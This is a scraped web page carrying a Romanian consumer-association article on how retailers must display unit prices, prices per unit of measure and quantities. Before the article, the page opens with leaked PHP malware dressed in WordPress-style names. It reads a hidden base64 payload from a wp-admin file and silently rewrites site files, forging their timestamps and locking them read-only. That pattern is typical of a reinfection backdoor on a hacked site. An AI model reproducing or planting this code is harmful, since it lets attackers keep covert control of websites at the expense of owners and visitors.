$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } InfoCons te informeaza: Cum trebuie afişat preţul unui produs? – O noua atitudine

InfoCons te informeaza: Cum trebuie afişat preţul unui produs?

1. Preţul de vânzare unitar

Preţul de vânzare unitar este preţul care trebuie plătit pentru o unitate sau o cantitate determinată de produs. Acest preţ trebuie indicat cu respectarea unor anumite principii :

  • trebuie indicat pe produs, pe ambalaj sau în imediata apropiere. Nu trebuie să existe nici o îndoială în ceea ce priveşte produsul la care se referă preţul.
  • dacă mai multe produse sunt oferite la vânzare la acelaşi preţ şi expuse împreună, vânzătorul poate afişa un singur preţ, chiar dacă nu este vorba de produse identice.
  • în cadrul aceleiaşi unităţi (locatii), vânzătorul trebuie să indice acelaşi preţ pentru produse identice.

 

2. Preţul pe unitatea de masură

Preţul pe unitatea de măsură este, după caz, preţul care se plăteşte pentru un kilogram, un litru, un metru, un metru pătrat ori un metru cub de produs sau orice altă unitate de măsură utilizată în mod generalizat şi obişnuit pentru comercializarea unor produse specifice, de exemplu gramul pentru anumite produse alimentare.

Pe lângă preţul de vânzare, vânzătorul trebuie să indice şi preţul pentru unitatea de măsură, după principiile aplicabile la indicarea preţului unitar.

Există mai multe excepţii de la indicarea preţului pe unitate de măsură, în special dacă preţul de vânzare şi preţul pe unitate sunt identice, dacă produsele sunt oferite spre vânzare într-un hotel, un restaurant şi alte unităţi similare şi sunt consumate pe loc. În aceste cazuri se va indica numai preţul de vânzare unitară.

În privinţa produselor vândute în vrac, trebuie indicat numai preţul pe unitate de măsură.

3. Indicarea cantităţii

Pentru orice produs comercializat în cantităţi determinate trebuie să fie menţionata pe ambalaj, în mod lizibil, vizibil şi neechivoc, cantitatea nominală exprimată într-o unitate de măsură legală.

Asociatia Nationala pentru Protectia Consumatorilor si Promovarea Programelor si Strategiilor din Romania -A.N.P.C.P.P.S.Romania – o9atitudine ! – InfoCons, unica organizatie din Romania cu drepturi depline in Consumers International, este o asociatie de consumatori neguvernamentala, reprezentativa, de drept privat, fara scop lucrativ, cu patrimoniu distinct si indivizibil, independenta, intemeiata pe principii democratice, ce apara drepturile consumatorilor – membra fondatoare a Federatiei Asociatiilor de Consumatori.

 

By o9admin